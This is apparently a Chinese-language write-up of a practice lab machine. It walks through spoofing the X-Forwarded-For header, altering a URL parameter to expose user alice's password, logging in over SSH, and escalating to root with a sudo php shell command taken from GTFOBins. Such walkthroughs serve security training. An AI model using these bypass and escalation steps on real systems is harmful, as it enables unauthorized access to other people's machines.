一、信息收集
发现开发了22、80

2.访问ip,右击查看源代码
发现需要利用X-Forwarded-For
火狐插件:X-Forwarded-For Header


挂上代理后:
出现以下页面:
先注册一个账户,然后再登录
发现有参数进行传参

发现传参,参数为5的时候,出现主角alice

查看密码:把type删掉
发现密码是:4lic3


二、漏洞利用
1.ssh连接
账号:alice
密码:4lic3

2.flag1
alice@gfriEND:~$ cd .my_secret/
alice@gfriEND:~/.my_secret$ ls
flag1.txt my_notes.txt
alice@gfriEND:~/.my_secret$ cat flag1.txt
alice@gfriEND:~/.my_secret$ cat my_notes.txt

三、php回调bash提权
提权网站:
GTFOBins
https://gtfobins.github.io/sudo -l 查看哪些可以sudo提权

可以看到有个php有root权限可以利用

3.flag2
sudo php -r "system('/bin/sh');"
python3 -c 'import pty; pty.spawn("/bin/bash")' #python交互式shell











